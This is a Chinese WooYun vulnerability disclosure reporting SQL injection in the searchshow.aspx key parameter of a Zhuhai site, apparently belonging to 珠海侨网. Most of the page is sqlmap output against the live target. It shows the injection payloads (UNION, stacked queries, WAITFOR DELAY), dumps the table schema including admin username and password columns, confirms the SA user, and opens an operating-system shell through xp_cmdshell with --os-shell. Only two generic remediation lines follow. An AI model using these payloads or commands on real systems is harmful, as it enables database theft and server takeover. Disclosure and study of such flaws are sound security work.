当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196058

漏洞标题:珠海侨网某处存在sql注入/可以获得shell

相关厂商:珠海侨网

漏洞作者: 路人甲

提交时间:2016-04-14 10:13

修复时间:2016-05-29 10:20

公开时间:2016-05-29 10:20

漏洞类型:sql注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

珠海侨网某处存在sql注入

详细说明:

**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27


root@ruins:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" -t T_Admin  --columns
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20160413}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:22:39
T_Admin
[22:22:39] [INFO] setting file for logging HTTP traffic
[22:22:39] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[22:22:41] [INFO] resuming back-end DBMS 'microsoft sql server' 
[22:22:41] [INFO] testing connection to the target URL
[22:22:41] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: key (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'--
---
[22:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:22:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:22:41] [INFO] fetching current database
[22:22:41] [INFO] fetching tables for database: zhqw
[22:22:41] [INFO] the SQL query used returns 32 entries
[22:22:41] [INFO] fetching columns for table 'Choice' in database 'zhqw'              
[22:22:41] [INFO] the SQL query used returns 5 entries
[22:22:41] [INFO] resumed: "choice","nvarchar"
[22:22:41] [INFO] resumed: "extends","int"
[22:22:41] [INFO] resumed: "id","int"
[22:22:41] [INFO] resumed: "IsDefault","int"
[22:22:41] [INFO] resumed: "num","int"
[22:22:41] [INFO] fetching columns for table 'Reply' in database 'zhqw'               
[22:22:42] [INFO] the SQL query used returns 4 entries
[22:22:42] [INFO] retrieved: "contant","nvarchar"
[22:22:42] [INFO] retrieved: "id","int"
[22:22:43] [INFO] retrieved: "replytime","datetime"
[22:22:43] [INFO] retrieved: "tid","int"
[22:22:43] [INFO] fetching columns for table 'T_Admin' in database 'zhqw'             
[22:22:44] [INFO] the SQL query used returns 11 entries
[22:22:45] [INFO] retrieved: "addtime","datetime"
[22:22:45] [INFO] retrieved: "AdminWrite","ntext"
[22:22:45] [INFO] retrieved: "bumenid","int"
[22:22:46] [INFO] retrieved: "czname","nvarchar"
[22:22:46] [INFO] retrieved: "jueseid","nvarchar"
[22:22:46] [INFO] retrieved: "phone","nvarchar"
[22:22:47] [INFO] retrieved: "roleid","int"
[22:22:47] [INFO] retrieved: "uid","int"
[22:22:47] [INFO] retrieved: "userid","nvarchar"
[22:22:48] [INFO] retrieved: "username","nvarchar"
[22:22:48] [INFO] retrieved: "userpwd","nvarchar"
[22:22:48] [INFO] fetching columns for table 'Title' in database 'zhqw'               
[22:22:49] [INFO] the SQL query used returns 6 entries
[22:22:49] [INFO] retrieved: "choice","smallint"
[22:22:49] [INFO] retrieved: "current","bit"
[22:22:50] [INFO] retrieved: "id","int"
[22:22:50] [INFO] retrieved: "title","nvarchar"
[22:22:50] [INFO] retrieved: "typeid","int"
[22:22:51] [INFO] retrieved: "windows","bit"
[22:22:51] [INFO] fetching columns for table 'aboutInfo' in database 'zhqw'           
[22:22:51] [INFO] the SQL query used returns 4 entries
[22:22:52] [INFO] retrieved: "aid","int"
[22:22:52] [INFO] retrieved: "neirong","nvarchar"
[22:22:52] [INFO] retrieved: "stypeid","int"
[22:22:53] [INFO] retrieved: "typeid","int"
[22:22:53] [INFO] fetching columns for table 'adInfo' in database 'zhqw'              
[22:22:53] [INFO] the SQL query used returns 6 entries
[22:22:53] [INFO] retrieved: "aid","int"
[22:22:54] [INFO] retrieved: "ispass","int"
[22:22:54] [INFO] retrieved: "link","nvarchar"
[22:22:55] [INFO] retrieved: "name","nvarchar"
[22:22:55] [INFO] retrieved: "pic","nvarchar"
[22:22:55] [INFO] retrieved: "typeid","int"
[22:22:56] [INFO] fetching columns for table 'bumenInfo' in database 'zhqw'           
[22:22:56] [INFO] the SQL query used returns 3 entries
[22:22:56] [INFO] retrieved: "beizhu","nvarchar"
[22:22:57] [INFO] retrieved: "bid","int"
[22:22:57] [INFO] retrieved: "name","nvarchar"
[22:22:57] [INFO] fetching columns for table 'classType' in database 'zhqw'           
[22:22:57] [INFO] the SQL query used returns 6 entries
[22:22:58] [INFO] retrieved: "cid","int"
[22:22:58] [INFO] retrieved: "classname","nvarchar"
[22:22:58] [INFO] retrieved: "htlink","nvarchar"
[22:22:59] [INFO] retrieved: "lowerid","int"
[22:22:59] [INFO] retrieved: "pxid","int"
[22:23:00] [INFO] retrieved: "qtlink","nvarchar"
[22:23:00] [INFO] fetching columns for table 'config' in database 'zhqw'              
[22:23:00] [INFO] the SQL query used returns 12 entries
[22:23:00] [INFO] retrieved: "ckid","int"
[22:23:01] [INFO] retrieved: "count","int"
[22:23:01] [INFO] retrieved: "webAddress","nvarchar"
[22:23:01] [INFO] retrieved: "webemail","nvarchar"
[22:23:02] [INFO] retrieved: "webFax","nvarchar"
[22:23:02] [INFO] retrieved: "webhomepage","nvarchar"
[22:23:02] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webname","nvarchar"
[22:23:03] [INFO] retrieved: "webTel","nvarchar"
[22:23:04] [INFO] retrieved: "webyoubian","nvarchar"
[22:23:04] [INFO] retrieved: "wid","int"
[22:23:04] [INFO] fetching columns for table 'dingyueInfo' in database 'zhqw'         
[22:23:04] [INFO] the SQL query used returns 8 entries
[22:23:05] [INFO] retrieved: "addtime","datetime"
[22:23:05] [INFO] retrieved: "did","int"
[22:23:06] [INFO] retrieved: "laiyuan","nvarchar"
[22:23:06] [INFO] retrieved: "neirong","nvarchar"
[22:23:06] [INFO] retrieved: "pic","nvarchar"
[22:23:07] [INFO] retrieved: "title","nvarchar"
[22:23:07] [INFO] retrieved: "typeid","int"
[22:23:08] [INFO] retrieved: "userid","nvarchar"
[22:23:08] [INFO] fetched tables' columns on database 'zhqw'                          
Database: zhqw
Table: config
[11 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ckid          | int      |
| count         | int      |
| webAddress    | nvarchar |
| webemail      | nvarchar |
| webFax        | nvarchar |
| webhomepage   | nvarchar |
| webKeycontent | nvarchar |
| webname       | nvarchar |
| webTel        | nvarchar |
| webyoubian    | nvarchar |
| wid           | int      |
+---------------+----------+
Database: zhqw
Table: bumenInfo
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| beizhu | nvarchar |
| bid    | int      |
| name   | nvarchar |
+--------+----------+
Database: zhqw
Table: T_Admin
[11 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| addtime    | datetime |
| AdminWrite | ntext    |
| bumenid    | int      |
| czname     | nvarchar |
| jueseid    | nvarchar |
| phone      | nvarchar |
| roleid     | int      |
| uid        | int      |
| userid     | nvarchar |
| username   | nvarchar |
| userpwd    | nvarchar |
+------------+----------+
Database: zhqw
Table: dingyueInfo
[8 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| addtime | datetime |
| did     | int      |
| laiyuan | nvarchar |
| neirong | nvarchar |
| pic     | nvarchar |
| title   | nvarchar |
| typeid  | int      |
| userid  | nvarchar |
+---------+----------+
Database: zhqw
Table: adInfo
[6 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| aid    | int      |
| ispass | int      |
| link   | nvarchar |
| name   | nvarchar |
| pic    | nvarchar |
| typeid | int      |
+--------+----------+
Database: zhqw
Table: aboutInfo
[4 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| aid     | int      |
| neirong | nvarchar |
| stypeid | int      |
| typeid  | int      |
+---------+----------+
Database: zhqw
Table: classType
[6 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| cid       | int      |
| classname | nvarchar |
| htlink    | nvarchar |
| lowerid   | int      |
| pxid      | int      |
| qtlink    | nvarchar |
+-----------+----------+
Database: zhqw
Table: Title
[6 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| choice  | smallint |
| current | bit      |
| id      | int      |
| title   | nvarchar |
| typeid  | int      |
| windows | bit      |
+---------+----------+
Database: zhqw
Table: Choice
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| choice    | nvarchar |
| extends   | int      |
| id        | int      |
| IsDefault | int      |
| num       | int      |
+-----------+----------+
Database: zhqw
Table: Reply
[4 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| contant   | nvarchar |
| id        | int      |
| replytime | datetime |
| tid       | int      |
+-----------+----------+
[22:23:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 22:23:08


当前数据库各个表对应的段名,从表名就可以看到这个网站很多信息,包括config配置信息,bumenINFO部门信息,admin信息,ad广告信息,还有回复信息,订阅信息等。

2016-04-13 22^%13^%25的屏幕截图.png


2016-04-13 22^%16^%28的屏幕截图.png


当前用户为SA,sa是mssql的默认用户,是system和admin的缩写,具有mssql最高权限。

2016-04-13 22^%56^%55的屏幕截图.png


2016-04-13 23^%26^%05的屏幕截图.png


root@ruins:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" --random-agent --os-shell
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20160413}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:48:54
[23:48:54] [INFO] fetched random HTTP User-Agent header from file '/usr/share/w3af/w3af/plugins/attack/db/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/**.**.**.**'
[23:48:54] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[23:48:57] [INFO] resuming back-end DBMS 'microsoft sql server' 
[23:48:57] [INFO] testing connection to the target URL
[23:48:58] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: key (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'--
---
[23:48:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:48:58] [INFO] testing if current user is DBA
[23:48:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[23:49:30] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[23:49:30] [INFO] testing if xp_cmdshell extended procedure is usable
[23:50:12] [ERROR] unable to retrieve xp_cmdshell output
[23:50:12] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[23:50:12] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>


漏洞证明:

root@ruins:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" --random-agent --os-shell
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20160413}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:48:54
[23:48:54] [INFO] fetched random HTTP User-Agent header from file '/usr/share/w3af/w3af/plugins/attack/db/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/**.**.**.**'
[23:48:54] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[23:48:57] [INFO] resuming back-end DBMS 'microsoft sql server' 
[23:48:57] [INFO] testing connection to the target URL
[23:48:58] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: key (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'--
---
[23:48:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:48:58] [INFO] testing if current user is DBA
[23:48:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[23:49:30] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[23:49:30] [INFO] testing if xp_cmdshell extended procedure is usable
[23:50:12] [ERROR] unable to retrieve xp_cmdshell output
[23:50:12] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[23:50:12] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami

修复方案:

采用权限最小原则
采取一些针对sql注入的防御方案

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)